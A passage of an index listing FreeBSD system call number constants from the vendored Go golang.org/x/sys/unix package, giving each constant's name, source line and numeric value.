400 constant SYS_KSEM_POST (line 240) | SYS_KSEM_POST = 401 constant SYS_KSEM_WAIT (line 241) | SYS_KSEM_WAIT = 402 constant SYS_KSEM_TRYWAIT (line 242) | SYS_KSEM_TRYWAIT = 403 constant SYS_KSEM_INIT (line 243) | SYS_KSEM_INIT = 404 constant SYS_KSEM_OPEN (line 244) | SYS_KSEM_OPEN = 405 constant SYS_KSEM_UNLINK (line 245) | SYS_KSEM_UNLINK = 406 constant SYS_KSEM_GETVALUE (line 246) | SYS_KSEM_GETVALUE = 407 constant SYS_KSEM_DESTROY (line 247) | SYS_KSEM_DESTROY = 408 constant SYS___MAC_GET_PID (line 248) | SYS___MAC_GET_PID = 409 constant SYS___MAC_GET_LINK (line 249) | SYS___MAC_GET_LINK = 410 constant SYS___MAC_SET_LINK (line 250) | SYS___MAC_SET_LINK = 411 constant SYS_EXTATTR_SET_LINK (line 251) | SYS_EXTATTR_SET_LINK = 412 constant SYS_EXTATTR_GET_LINK (line 252) | SYS_EXTATTR_GET_LINK = 413 constant SYS_EXTATTR_DELETE_LINK (line 253) | SYS_EXTATTR_DELETE_LINK = 414 constant SYS___MAC_EXECVE (line 254) | SYS___MAC_EXECVE = 415 constant SYS_SIGACTION (line 255) | SYS_SIGACTION = 416 constant SYS_SIGRETURN (line 256) | SYS_SIGRETURN = 417 constant SYS_GETCONTEXT (line 257) | SYS_GETCONTEXT = 421 constant SYS_SETCONTEXT (line 258) | SYS_SETCONTEXT = 422 constant SYS_SWAPCONTEXT (line 259) | SYS_SWAPCONTEXT = 423 constant SYS_SWAPOFF (line 260) | SYS_SWAPOFF = 424 constant SYS___ACL_GET_LINK (line 261) | SYS___ACL_GET_LINK = 425 constant SYS___ACL_SET_LINK (line 262) | SYS___ACL_SET_LINK = 426 constant SYS___ACL_DELETE_LINK (line 263) | SYS___ACL_DELETE_LINK = 427 constant SYS___ACL_ACLCHECK_LINK (line 264) | SYS___ACL_ACLCHECK_LINK = 428 constant SYS_SIGWAIT (line 265) | SYS_SIGWAIT = 429 constant SYS_THR_CREATE (line 266) | SYS_THR_CREATE = 430 constant SYS_THR_EXIT (line 267) | SYS_THR_EXIT = 431 constant SYS_THR_SELF (line 268) | SYS_THR_SELF = 432 constant SYS_THR_KILL (line 269) | SYS_THR_KILL = 433 constant SYS_JAIL_ATTACH (line 270) | SYS_JAIL_ATTACH = 436 constant SYS_EXTATTR_LIST_FD (line 271) | SYS_EXTATTR_LIST_FD = 437 constant SYS_EXTATTR_LIST_FILE (line 272) | SYS_EXTATTR_LIST_FILE = 438 constant SYS_EXTATTR_LIST_LINK (line 273) | SYS_EXTATTR_LIST_LINK = 439 constant SYS_KSEM_TIMEDWAIT (line 274) | SYS_KSEM_TIMEDWAIT = 441 constant SYS_THR_SUSPEND (line 275) | SYS_THR_SUSPEND = 442 constant SYS_THR_WAKE (line 276) | SYS_THR_WAKE = 443 constant SYS_KLDUNLOADF (line 277) | SYS_KLDUNLOADF = 444 constant SYS_AUDIT (line 278) | SYS_AUDIT = 445 constant SYS_AUDITON (line 279) | SYS_AUDITON = 446 constant SYS_GETAUID (line 280) | SYS_GETAUID = 447 constant SYS_SETAUID (line 281) | SYS_SETAUID = 448 constant SYS_GETAUDIT (line 282) | SYS_GETAUDIT = 449 constant SYS_SETAUDIT (line 283) | SYS_SETAUDIT = 450 constant SYS_GETAUDIT_ADDR (line 284) | SYS_GETAUDIT_ADDR = 451 constant SYS_SETAUDIT_ADDR (line 285) | SYS_SETAUDIT_ADDR = 452 constant SYS_AUDITCTL (line 286) | SYS_AUDITCTL = 453 constant SYS__UMTX_OP (line 287) | SYS__UMTX_OP = 454 constant SYS_THR_NEW (line 288) | SYS_THR_NEW = 455 constant SYS_SIGQUEUE (line 289) | SYS_SIGQUEUE = 456 constant SYS_KMQ_OPEN (line 290) | SYS_KMQ_OPEN = 457 constant SYS_KMQ_SETATTR (line 291) | SYS_KMQ_SETATTR = 458 constant SYS_KMQ_TIMEDRECEIVE (line 292) | SYS_KMQ_TIMEDRECEIVE = 459 constant SYS_KMQ_TIMEDSEND (line 293) | SYS_KMQ_TIMEDSEND = 460 constant SYS_KMQ_NOTIFY (line 294) | SYS_KMQ_NOTIFY = 461 constant SYS_KMQ_UNLINK (line 295) | SYS_KMQ_UNLINK = 462 constant SYS_ABORT2 (line 296) | SYS_ABORT2 = 463 constant SYS_THR_SET_NAME (line 297) | SYS_THR_SET_NAME = 464 constant SYS_AIO_FSYNC (line 298) | SYS_AIO_FSYNC = 465 constant SYS_RTPRIO_THREAD (line 299) | SYS_RTPRIO_THREAD = 466 constant SYS_SCTP_PEELOFF (line 300) | SYS_SCTP_PEELOFF = 471 constant SYS_SCTP_GENERIC_SENDMSG (line 301) | SYS_SCTP_GENERIC_SENDMSG = 472 constant SYS_SCTP_GENERIC_SENDMSG_IOV (line 302) | SYS_SCTP_GENERIC_SENDMSG_IOV = 473 constant SYS_SCTP_GENERIC_RECVMSG (line 303) | SYS_SCTP_GENERIC_RECVMSG = 474 constant SYS_PREAD (line 304) | SYS_PREAD = 475 constant SYS_PWRITE (line 305) | SYS_PWRITE = 476 constant SYS_MMAP (line 306) | SYS_MMAP = 477 constant SYS_LSEEK (line 307) | SYS_LSEEK = 478 constant SYS_TRUNCATE (line 308) | SYS_TRUNCATE = 479 constant SYS_FTRUNCATE (line 309) | SYS_FTRUNCATE = 480 constant SYS_THR_KILL2 (line 310) | SYS_THR_KILL2 = 481 constant SYS_SHM_OPEN (line 311) | SYS_SHM_OPEN = 482 constant SYS_SHM_UNLINK (line 312) | SYS_SHM_UNLINK = 483 constant SYS_CPUSET (line 313) | SYS_CPUSET = 484 constant SYS_CPUSET_SETID (line 314) | SYS_CPUSET_SETID = 485 constant SYS_CPUSET_GETID (line 315) | SYS_CPUSET_GETID = 486 constant SYS_CPUSET_GETAFFINITY (line 316) | SYS_CPUSET_GETAFFINITY = 487 constant SYS_CPUSET_SETAFFINITY (line 317) | SYS_CPUSET_SETAFFINITY = 488 constant SYS_FACCESSAT (line 318) | SYS_FACCESSAT = 489 constant SYS_FCHMODAT (line 319) | SYS_FCHMODAT = 490 constant SYS_FCHOWNAT (line 320) | SYS_FCHOWNAT = 491 constant SYS_FEXECVE (line 321) | SYS_FEXECVE = 492 constant SYS_FUTIMESAT (line 322) | SYS_FUTIMESAT = 494 constant SYS_LINKAT (line 323) | SYS_LINKAT = 495 constant SYS_MKDIRAT (line 324) | SYS_MKDIRAT = 496 constant SYS_MKFIFOAT (line 325) | SYS_MKFIFOAT = 497 constant SYS_OPENAT (line 326) | SYS_OPENAT = 499 constant SYS_READLINKAT (line 327) | SYS_READLINKAT = 500 constant SYS_RENAMEAT (line 328) | SYS_RENAMEAT = 501 constant SYS_SYMLINKAT (line 329) | SYS_SYMLINKAT = 502 constant SYS_UNLINKAT (line 330) | SYS_UNLINKAT = 503 constant SYS_POSIX_OPENPT (line 331) | SYS_POSIX_OPENPT = 504 constant SYS_GSSD_SYSCALL (line 332) | SYS_GSSD_SYSCALL = 505 constant SYS_JAIL_GET (line 333) | SYS_JAIL_GET = 506 constant SYS_JAIL_SET (line 334) | SYS_JAIL_SET = 507 constant SYS_JAIL_REMOVE (line 335) | SYS_JAIL_REMOVE = 508 constant SYS_CLOSEFROM (line 336) | SYS_CLOSEFROM = 509 constant SYS___SEMCTL (line 337) | SYS___SEMCTL = 510 constant SYS_MSGCTL (line 338) | SYS_MSGCTL = 511 constant SYS_SHMCTL (line 339) | SYS_SHMCTL = 512 constant SYS_LPATHCONF (line 340) | SYS_LPATHCONF = 513 constant SYS___CAP_RIGHTS_GET (line 341) | SYS___CAP_RIGHTS_GET = 515 constant SYS_CAP_ENTER (line 342) | SYS_CAP_ENTER = 516 constant SYS_CAP_GETMODE (line 343) | SYS_CAP_GETMODE = 517 constant SYS_PDFORK (line 344) | SYS_PDFORK = 518 constant SYS_PDKILL (line 345) | SYS_PDKILL = 519 constant SYS_PDGETPID (line 346) | SYS_PDGETPID = 520 constant SYS_PSELECT (line 347) | SYS_PSELECT = 522 constant SYS_GETLOGINCLASS (line 348) | SYS_GETLOGINCLASS = 523 constant SYS_SETLOGINCLASS (line 349) | SYS_SETLOGINCLASS = 524 constant SYS_RCTL_GET_RACCT (line 350) | SYS_RCTL_GET_RACCT = 525 constant SYS_RCTL_GET_RULES (line 351) | SYS_RCTL_GET_RULES = 526 constant SYS_RCTL_GET_LIMITS (line 352) | SYS_RCTL_GET_LIMITS = 527 constant SYS_RCTL_ADD_RULE (line 353) | SYS_RCTL_ADD_RULE = 528 constant SYS_RCTL_REMOVE_RULE (line 354) | SYS_RCTL_REMOVE_RULE = 529 constant SYS_POSIX_FALLOCATE (line 355) | SYS_POSIX_FALLOCATE = 530 constant SYS_POSIX_FADVISE (line 356) | SYS_POSIX_FADVISE = 531 constant SYS_WAIT6 (line 357) | SYS_WAIT6 = 532 constant SYS_CAP_RIGHTS_LIMIT (line 358) | SYS_CAP_RIGHTS_LIMIT = 533 constant SYS_CAP_IOCTLS_LIMIT (line 359) | SYS_CAP_IOCTLS_LIMIT = 534 constant SYS_CAP_IOCTLS_GET (line 360) | SYS_CAP_IOCTLS_GET = 535 constant SYS_CAP_FCNTLS_LIMIT (line 361) | SYS_CAP_FCNTLS_LIMIT = 536 constant SYS_CAP_FCNTLS_GET (line 362) | SYS_CAP_FCNTLS_GET = 537 constant SYS_BINDAT (line 363) | SYS_BINDAT = 538 constant SYS_CONNECTAT (line 364) | SYS_CONNECTAT = 539 constant SYS_CHFLAGSAT (line 365) | SYS_CHFLAGSAT = 540 constant SYS_ACCEPT4 (line 366) | SYS_ACCEPT4 = 541 constant SYS_PIPE2 (line 367) | SYS_PIPE2 = 542 constant SYS_AIO_MLOCK (line 368) | SYS_AIO_MLOCK = 543 constant SYS_PROCCTL (line 369) | SYS_PROCCTL = 544 constant SYS_PPOLL (line 370) | SYS_PPOLL = 545 constant SYS_FUTIMENS (line 371) | SYS_FUTIMENS = 546 constant SYS_UTIMENSAT (line 372) | SYS_UTIMENSAT = 547 constant SYS_FDATASYNC (line 373) | SYS_FDATASYNC = 550 constant SYS_FSTAT (line 374) | SYS_FSTAT = 551 constant SYS_FSTATAT (line 375) | SYS_FSTATAT = 552 constant SYS_FHSTAT (line 376) | SYS_FHSTAT = 553 constant SYS_GETDIRENTRIES (line 377) | SYS_GETDIRENTRIES = 554 constant SYS_STATFS (line 378) | SYS_STATFS = 555 constant SYS_FSTATFS (line 379) | SYS_FSTATFS = 556 constant SYS_GETFSSTAT (line 380) | SYS_GETFSSTAT = 557 constant SYS_FHSTATFS (line 381) | SYS_FHSTATFS = 558 constant SYS_MKNODAT (line 382) | SYS_MKNODAT = 559 constant SYS_KEVENT (line 383) | SYS_KEVENT = 560 constant SYS_CPUSET_GETDOMAIN (line 384) | SYS_CPUSET_GETDOMAIN = 561 constant SYS_CPUSET_SETDOMAIN (line 385) | SYS_CPUSET_SETDOMAIN = 562 constant SYS_GETRANDOM (line 386) | SYS_GETRANDOM = 563 constant SYS_GETFHAT (line 387) | SYS_GETFHAT = 564 constant SYS_FHLINK (line 388) | SYS_FHLINK = 565 constant SYS_FHLINKAT (line 389) | SYS_FHLINKAT = 566 constant SYS_FHREADLINK (line 390) | SYS_FHREADLINK = 567 constant SYS___SYSCTLBYNAME (line 391) | SYS___SYSCTLBYNAME = 570 constant SYS_CLOSE_RANGE (line 392) | SYS_CLOSE_RANGE = 575 FILE: vendor/golang.org/x/sys/unix/zsysnum_freebsd_arm.go constant SYS_EXIT (line 10) | SYS_EXIT = 1 constant SYS_FORK (line 11) | SYS_FORK = 2 constant SYS_READ (line 12) | SYS_READ = 3 constant SYS_WRITE (line 13) | SYS_WRITE = 4 constant SYS_OPEN (line 14) | SYS_OPEN = 5 constant SYS_CLOSE (line 15) | SYS_CLOSE = 6 constant SYS_WAIT4 (line 16) | SYS_WAIT4 = 7 constant SYS_LINK (line 17) | SYS_LINK = 9 constant SYS_UNLINK (line 18) | SYS_UNLINK = 10 constant SYS_CHDIR (line 19) | SYS_CHDIR = 12 constant SYS_FCHDIR (line 20) | SYS_FCHDIR = 13 constant SYS_CHMOD (line 21) | SYS_CHMOD = 15 constant SYS_CHOWN (line 22) | SYS_CHOWN = 16 constant SYS_BREAK (line 23) | SYS_BREAK = 17 constant SYS_GETPID (line 24) | SYS_GETPID = 20 constant SYS_MOUNT (line 25) | SYS_MOUNT = 21 constant SYS_UNMOUNT (line 26) | SYS_UNMOUNT = 22 constant SYS_SETUID (line 27) | SYS_SETUID = 23 constant SYS_GETUID (line 28) | SYS_GETUID = 24 constant SYS_GETEUID (line 29) | SYS_GETEUID = 25 constant SYS_PTRACE (line 30) | SYS_PTRACE = 26 constant SYS_RECVMSG (line 31) | SYS_RECVMSG = 27 constant SYS_SENDMSG (line 32) | SYS_SENDMSG = 28 constant SYS_RECVFROM (line 33) | SYS_RECVFROM = 29 constant SYS_ACCEPT (line 34) | SYS_ACCEPT = 30 constant SYS_GETPEERNAME (line 35) | SYS_GETPEERNAME = 31 constant SYS_GETSOCKNAME (line 36) | SYS_GETSOCKNAME = 32 constant SYS_ACCESS (line 37) | SYS_ACCESS = 33 constant SYS_CHFLAGS (line 38) | SYS_CHFLAGS = 34 constant SYS_FCHFLAGS (line 39) | SYS_FCHFLAGS = 35 constant SYS_SYNC (line 40) | SYS_SYNC = 36 constant SYS_KILL (line 41) | SYS_KILL = 37 constant SYS_GETPPID (line 42) | SYS_GETPPID = 39 constant SYS_DUP (line 43) | SYS_DUP = 41 constant SYS_GETEGID (line 44) | SYS_GETEGID = 43 constant SYS_PROFIL (line 45) | SYS_PROFIL = 44 constant SYS_KTRACE (line 46) | SYS_KTRACE = 45 constant SYS_GETGID (line 47) | SYS_GETGID = 47 constant SYS_GETLOGIN (line 48) | SYS_GETLOGIN = 49 constant SYS_SETLOGIN (line 49) | SYS_SETLOGIN = 50 constant SYS_ACCT (line 50) | SYS_ACCT = 51 constant SYS_SIGALTSTACK (line 51) | SYS_SIGALTSTACK = 53 constant SYS_IOCTL (line 52) | SYS_IOCTL = 54 constant SYS_REBOOT (line 53) | SYS_REBOOT = 55 constant SYS_REVOKE (line 54) | SYS_REVOKE = 56 constant SYS_SYMLINK (line 55) | SYS_SYMLINK = 57 constant SYS_READLINK (line 56) | SYS_READLINK = 58 constant SYS_EXECVE (line 57) | SYS_EXECVE = 59 constant SYS_UMASK (line 58) | SYS_UMASK = 60 constant SYS_CHROOT (line 59) | SYS_CHROOT = 61 constant SYS_MSYNC (line 60) | SYS_MSYNC = 65 constant SYS_VFORK (line 61) | SYS_VFORK = 66 constant SYS_SBRK (line 62) | SYS_SBRK = 69 constant SYS_SSTK (line 63) | SYS_SSTK = 70 constant SYS_MUNMAP (line 64) | SYS_MUNMAP = 73 constant SYS_MPROTECT (line 65) | SYS_MPROTECT = 74 constant SYS_MADVISE (line 66) | SYS_MADVISE = 75 constant SYS_MINCORE (line 67) | SYS_MINCORE = 78 constant SYS_GETGROUPS (line 68) | SYS_GETGROUPS = 79 constant SYS_SETGROUPS (line 69) | SYS_SETGROUPS = 80 constant SYS_GETPGRP (line 70) | SYS_GETPGRP = 81 constant SYS_SETPGID (line 71) | SYS_SETPGID = 82 constant SYS_SETITIMER (line 72) | SYS_SETITIMER = 83 constant SYS_SWAPON (line 73) | SYS_SWAPON = 85 constant SYS_GETITIMER (line 74) | SYS_GETITIMER = 86 constant SYS_GETDTABLESIZE (line 75) | SYS_GETDTABLESIZE = 89 constant SYS_DUP2 (line 76) | SYS_DUP2 = 90 constant SYS_FCNTL (line 77) | SYS_FCNTL = 92 constant SYS_SELECT (line 78) | SYS_SELECT = 93 constant SYS_FSYNC (line 79) | SYS_FSYNC = 95 constant SYS_SETPRIORITY (line 80) | SYS_SETPRIORITY = 96 constant SYS_SOCKET (line 81) | SYS_SOCKET = 97 constant SYS_CONNECT (line 82) | SYS_CONNECT = 98 constant SYS_GETPRIORITY (line 83) | SYS_GETPRIORITY = 100 constant SYS_BIND (line 84) | SYS_BIND = 104 constant SYS_SETSOCKOPT (line 85) | SYS_SETSOCKOPT = 105 constant SYS_LISTEN (line 86) | SYS_LISTEN = 106 constant SYS_GETTIMEOFDAY (line 87) | SYS_GETTIMEOFDAY = 116 constant SYS_GETRUSAGE (line 88) | SYS_GETRUSAGE = 117 constant SYS_GETSOCKOPT (line 89) | SYS_GETSOCKOPT = 118 constant SYS_READV (line 90) | SYS_READV = 120 constant SYS_WRITEV (line 91) | SYS_WRITEV = 121 constant SYS_SETTIMEOFDAY (line 92) | SYS_SETTIMEOFDAY = 122 constant SYS_FCHOWN (line 93) | SYS_FCHOWN = 123 constant SYS_FCHMOD (line 94) | SYS_FCHMOD = 124 constant SYS_SETREUID (line 95) | SYS_SETREUID = 126 constant SYS_SETREGID (line 96) | SYS_SETREGID = 127 constant SYS_RENAME (line 97) | SYS_RENAME = 128 constant SYS_FLOCK (line 98) | SYS_FLOCK = 131 constant SYS_MKFIFO (line 99) | SYS_MKFIFO = 132 constant SYS_SENDTO (line 100) | SYS_SENDTO = 133 constant SYS_SHUTDOWN (line 101) | SYS_SHUTDOWN = 134 constant SYS_SOCKETPAIR (line 102) | SYS_SOCKETPAIR = 135 constant SYS_MKDIR (line 103) | SYS_MKDIR = 136 constant SYS_RMDIR (line 104) | SYS_RMDIR = 137 constant SYS_UTIMES (line 105) | SYS_UTIMES = 138 constant SYS_ADJTIME (line 106) | SYS_ADJTIME = 140 constant SYS_SETSID (line 107) | SYS_SETSID = 147 constant SYS_QUOTACTL (line 108) | SYS_QUOTACTL = 148 constant SYS_NLM_SYSCALL (line 109) | SYS_NLM_SYSCALL = 154 constant SYS_NFSSVC (line 110) | SYS_NFSSVC = 155 constant SYS_LGETFH (line 111) | SYS_LGETFH = 160 constant SYS_GETFH (line 112) | SYS_GETFH = 161 constant SYS_SYSARCH (line 113) | SYS_SYSARCH = 165 constant SYS_RTPRIO (line 114) | SYS_RTPRIO = 166 constant SYS_SEMSYS (line 115) | SYS_SEMSYS = 169 constant SYS_MSGSYS (line 116) | SYS_MSGSYS = 170 constant SYS_SHMSYS (line 117) | SYS_SHMSYS = 171 constant SYS_SETFIB (line 118) | SYS_SETFIB = 175 constant SYS_NTP_ADJTIME (line 119) | SYS_NTP_ADJTIME = 176 constant SYS_SETGID (line 120) | SYS_SETGID = 181 constant SYS_SETEGID (line 121) | SYS_SETEGID = 182 constant SYS_SETEUID (line 122) | SYS_SETEUID = 183 constant SYS_PATHCONF (line 123) | SYS_PATHCONF = 191 constant SYS_FPATHCONF (line 124) | SYS_FPATHCONF = 192 constant SYS_GETRLIMIT (line 125) | SYS_GETRLIMIT = 194 constant SYS_SETRLIMIT (line 126) | SYS_SETRLIMIT = 195 constant SYS___SYSCTL (line 127) | SYS___SYSCTL = 202 constant SYS_MLOCK (line 128) | SYS_MLOCK = 203 constant SYS_MUNLOCK (line 129) | SYS_MUNLOCK = 204 constant SYS_UNDELETE (line 130) | SYS_UNDELETE = 205 constant SYS_FUTIMES (line 131) | SYS_FUTIMES = 206 constant SYS_GETPGID (line 132) | SYS_GETPGID = 207 constant SYS_POLL (line 133) | SYS_POLL = 209 constant SYS_SEMGET (line 134) | SYS_SEMGET = 221 constant SYS_SEMOP (line 135) | SYS_SEMOP = 222 constant SYS_MSGGET (line 136) | SYS_MSGGET = 225 constant SYS_MSGSND (line 137) | SYS_MSGSND = 226 constant SYS_MSGRCV (line 138) | SYS_MSGRCV = 227 constant SYS_SHMAT (line 139) | SYS_SHMAT = 228 constant SYS_SHMDT (line 140) | SYS_SHMDT = 230 constant SYS_SHMGET (line 141) | SYS_SHMGET = 231 constant SYS_CLOCK_GETTIME (line 142) | SYS_CLOCK_GETTIME = 232 constant SYS_CLOCK_SETTIME (line 143) | SYS_CLOCK_SETTIME = 233 constant SYS_CLOCK_GETRES (line 144) | SYS_CLOCK_GETRES = 234 constant SYS_KTIMER_CREATE (line 145) | SYS_KTIMER_CREATE = 235 constant SYS_KTIMER_DELETE (line 146) | SYS_KTIMER_DELETE = 236 constant SYS_KTIMER_SETTIME (line 147) | SYS_KTIMER_SETTIME = 237 constant SYS_KTIMER_GETTIME (line 148) | SYS_KTIMER_GETTIME = 238 constant SYS_KTIMER_GETOVERRUN (line 149) | SYS_KTIMER_GETOVERRUN = 239 constant SYS_NANOSLEEP (line 150) | SYS_NANOSLEEP = 240 constant SYS_FFCLOCK_GETCOUNTER (line 151) | SYS_FFCLOCK_GETCOUNTER = 241 constant SYS_FFCLOCK_SETESTIMATE (line 152) | SYS_FFCLOCK_SETESTIMATE = 242 constant SYS_FFCLOCK_GETESTIMATE (line 153) | SYS_FFCLOCK_GETESTIMATE = 243 constant SYS_CLOCK_NANOSLEEP (line 154) | SYS_CLOCK_NANOSLEEP = 244 constant SYS_CLOCK_GETCPUCLOCKID2 (line 155) | SYS_CLOCK_GETCPUCLOCKID2 = 247 constant SYS_NTP_GETTIME (line 156) | SYS_NTP_GETTIME = 248 constant SYS_MINHERIT (line 157) | SYS_MINHERIT = 250 constant SYS_RFORK (line 158) | SYS_RFORK = 251 constant SYS_ISSETUGID (line 159) | SYS_ISSETUGID = 253 constant SYS_LCHOWN (line 160) | SYS_LCHOWN = 254 constant SYS_AIO_READ (line 161) | SYS_AIO_READ = 255 constant SYS_AIO_WRITE (line 162) | SYS_AIO_WRITE = 256 constant SYS_LIO_LISTIO (line 163) | SYS_LIO_LISTIO = 257 constant SYS_LCHMOD (line 164) | SYS_LCHMOD = 274 constant SYS_LUTIMES (line 165) | SYS_LUTIMES = 276 constant SYS_PREADV (line 166) | SYS_PREADV = 289 constant SYS_PWRITEV (line 167) | SYS_PWRITEV = 290 constant SYS_FHOPEN (line 168) | SYS_FHOPEN = 298 constant SYS_MODNEXT (line 169) | SYS_MODNEXT = 300 constant SYS_MODSTAT (line 170) | SYS_MODSTAT = 301 constant SYS_MODFNEXT (line 171) | SYS_MODFNEXT = 302 constant SYS_MODFIND (line 172) | SYS_MODFIND = 303 constant SYS_KLDLOAD (line 173) | SYS_KLDLOAD = 304 constant SYS_KLDUNLOAD (line 174) | SYS_KLDUNLOAD = 305 constant SYS_KLDFIND (line 175) | SYS_KLDFIND = 306 constant SYS_KLDNEXT (line 176) | SYS_KLDNEXT = 307 constant SYS_KLDSTAT (line 177) | SYS_KLDSTAT = 308 constant SYS_KLDFIRSTMOD (line 178) | SYS_KLDFIRSTMOD = 309 constant SYS_GETSID (line 179) | SYS_GETSID = 310 constant SYS_SETRESUID (line 180) | SYS_SETRESUID = 311 constant SYS_SETRESGID (line 181) | SYS_SETRESGID = 312 constant SYS_AIO_RETURN (line 182) | SYS_AIO_RETURN = 314 constant SYS_AIO_SUSPEND (line 183) | SYS_AIO_SUSPEND = 315 constant SYS_AIO_CANCEL (line 184) | SYS_AIO_CANCEL = 316 constant SYS_AIO_ERROR (line 185) | SYS_AIO_ERROR = 317 constant SYS_YIELD (line 186) | SYS_YIELD = 321 constant SYS_MLOCKALL (line 187) | SYS_MLOCKALL = 324 constant SYS_MUNLOCKALL (line 188) | SYS_MUNLOCKALL = 325 constant SYS___GETCWD (line 189) | SYS___GETCWD = 326 constant SYS_SCHED_SETPARAM (line 190) | SYS_SCHED_SETPARAM = 327 constant SYS_SCHED_GETPARAM (line 191) | SYS_SCHED_GETPARAM = 328 constant SYS_SCHED_SETSCHEDULER (line 192) | SYS_SCHED_SETSCHEDULER = 329 constant SYS_SCHED_GETSCHEDULER (line 193) | SYS_SCHED_GETSCHEDULER = 330 constant SYS_SCHED_YIELD (line 194) | SYS_SCHED_YIELD = 331 constant SYS_SCHED_GET_PRIORITY_MAX (line 195) | SYS_SCHED_GET_PRIORITY_MAX = 332 constant SYS_SCHED_GET_PRIORITY_MIN (line 196) | SYS_SCHED_GET_PRIORITY_MIN = 333 constant SYS_SCHED_RR_GET_INTERVAL (line 197) | SYS_SCHED_RR_GET_INTERVAL = 334 constant SYS_UTRACE (line 198) | SYS_UTRACE = 335 constant SYS_KLDSYM (line 199) | SYS_KLDSYM = 337 constant SYS_JAIL (line 200) | SYS_JAIL = 338 constant SYS_SIGPROCMASK (line 201) | SYS_SIGPROCMASK = 340 constant SYS_SIGSUSPEND (line 202) | SYS_SIGSUSPEND = 341 constant SYS_SIGPENDING (line 203) | SYS_SIGPENDING = 343 constant SYS_SIGTIMEDWAIT (line 204) | SYS_SIGTIMEDWAIT = 345 constant SYS_SIGWAITINFO (line 205) | SYS_SIGWAITINFO = 346 constant SYS___ACL_GET_FILE (line 206) | SYS___ACL_GET_FILE = 347 constant SYS___ACL_SET_FILE (line 207) | SYS___ACL_SET_FILE = 348 constant SYS___ACL_GET_FD (line 208) | SYS___ACL_GET_FD = 349 constant SYS___ACL_SET_FD (line 209) | SYS___ACL_SET_FD = 350 constant SYS___ACL_DELETE_FILE (line 210) | SYS___ACL_DELETE_FILE = 351 constant SYS___ACL_DELETE_FD (line 211) | SYS___ACL_DELETE_FD = 352 constant SYS___ACL_ACLCHECK_FILE (line 212) | SYS___ACL_ACLCHECK_FILE = 353 constant SYS___ACL_ACLCHECK_FD (line 213) | SYS___ACL_ACLCHECK_FD = 354 constant SYS_EXTATTRCTL (line 214) | SYS_EXTATTRCTL = 355 constant SYS_EXTATTR_SET_FILE (line 215) | SYS_EXTATTR_SET_FILE = 356 constant SYS_EXTATTR_GET_FILE (line 216) | SYS_EXTATTR_GET_FILE = 357 constant SYS_EXTATTR_DELETE_FILE (line 217) | SYS_EXTATTR_DELETE_FILE = 358 constant SYS_AIO_WAITCOMPLETE (line 218) | SYS_AIO_WAITCOMPLETE = 359 constant SYS_GETRESUID (line 219) | SYS_GETRESUID = 360 constant SYS_GETRESGID (line 220) | SYS_GETRESGID = 361 constant SYS_KQUEUE (line 221) | SYS_KQUEUE = 362 constant SYS_EXTATTR_SET_FD (line 222) | SYS_EXTATTR_SET_FD = 371 constant SYS_EXTATTR_GET_FD (line 223) | SYS_EXTATTR_GET_FD = 372 constant SYS_EXTATTR_DELETE_FD (line 224) | SYS_EXTATTR_DELETE_FD = 373 constant SYS___SETUGID (line 225) | SYS___SETUGID = 374 constant SYS_EACCESS (line 226) | SYS_EACCESS = 376 constant SYS_NMOUNT (line 227) | SYS_NMOUNT = 378 constant SYS___MAC_GET_PROC (line 228) | SYS___MAC_GET_PROC = 384 constant SYS___MAC_SET_PROC (line 229) | SYS___MAC_SET_PROC = 385 constant SYS___MAC_GET_FD (line 230) | SYS___MAC_GET_FD = 386 constant SYS___MAC_GET_FILE (line 231) | SYS___MAC_GET_FILE = 387 constant SYS___MAC_SET_FD (line 232) | SYS___MAC_SET_FD = 388 constant SYS___MAC_SET_FILE (line 233) | SYS___MAC_SET_FILE = 389 constant SYS_KENV (line 234) | SYS_KENV = 390 constant SYS_LCHFLAGS (line 235) | SYS_LCHFLAGS = 391 constant SYS_UUIDGEN (line 236) | SYS_UUIDGEN = 392 constant SYS_SENDFILE (line 237) | SYS_SENDFILE = 393 constant SYS_MAC_SYSCALL (line 238) | SYS_MAC_SYSCALL = 394 constant SYS_KSEM_CLOSE (line 239) | SYS_KSEM_CLOSE = 400 constant SYS_KSEM_POST (line 240) | SYS_KSEM_POST = 401 constant SYS_KSEM_WAIT (line 241) | SYS_KSEM_WAIT = 402 constant SYS_KSEM_TRYWAIT (line 242) | SYS_KSEM_TRYWAIT = 403 constant SYS_KSEM_INIT (line 243) | SYS_KSEM_INIT = 404 constant SYS_KSEM_OPEN (line 244) | SYS_KSEM_OPEN = 405 constant SYS_KSEM_UNLINK (line 245) | SYS_KSEM_UNLINK = 406 constant SYS_KSEM_GETVALUE (line 246) | SYS_KSEM_GETVALUE = 407 constant SYS_KSEM_DESTROY (line 247) | SYS_KSEM_DESTROY = 408 constant SYS___MAC_GET_PID (line 248) | SYS___MAC_GET_PID = 409 constant SYS___MAC_GET_LINK (line 249) | SYS___MAC_GET_LINK = 410 constant SYS___MAC_SET_LINK (line 250) | SYS___MAC_SET_LINK = 411 constant SYS_EXTATTR_SET_LINK (line 251) | SYS_EXTATTR_SET_LINK = 412 constant SYS_EXTATTR_GET_LINK (line 252) | SYS_EXTATTR_GET_LINK = 413 constant SYS_EXTATTR_DELETE_LINK (line 253) | SYS_EXTATTR_DELETE_LINK = 414 constant SYS___MAC_EXECVE (line 254) | SYS___MAC_EXECVE = 415 constant SYS_SIGACTION (line 255) | SYS_SIGACTION = 416 constant SYS_SIGRETURN (line 256) | SYS_SIGRETURN = 417 constant SYS_GETCONTEXT (line 257) | SYS_GETCONTEXT = 421 constant SYS_SETCONTEXT (line 258) | SYS_SETCONTEXT = 422 constant SYS_SWAPCONTEXT (line 259) | SYS_SWAPCONTEXT = 423 constant SYS_SWAPOFF (line 260) | SYS_SWAPOFF = 424 constant SYS___ACL_GET_LINK (line 261) | SYS___ACL_GET_LINK = 425 constant SYS___ACL_SET_LINK (line 262) | SYS___ACL_SET_LINK = 426 constant SYS___ACL_DELETE_LINK (line 263) | SYS___ACL_DELETE_LINK = 427 constant SYS___ACL_ACLCHECK_LINK (line 264) | SYS___ACL_ACLCHECK_LINK = 428 constant SYS_SIGWAIT (line 265) | SYS_SIGWAIT = 429 constant SYS_THR_CREATE (line 266) | SYS_THR_CREATE = 430 constant SYS_THR_EXIT (line 267) | SYS_THR_EXIT = 431 constant SYS_THR_SELF (line 268) | SYS_THR_SELF = 432 constant SYS_THR_KILL (line 269) | SYS_THR_KILL = 433 constant SYS_JAIL_ATTACH (line 270) | SYS_JAIL_ATTACH = 436 constant SYS_EXTATTR_LIST_FD (line 271) | SYS_EXTATTR_LIST_FD = 437 constant SYS_EXTATTR_LIST_FILE (line 272) | 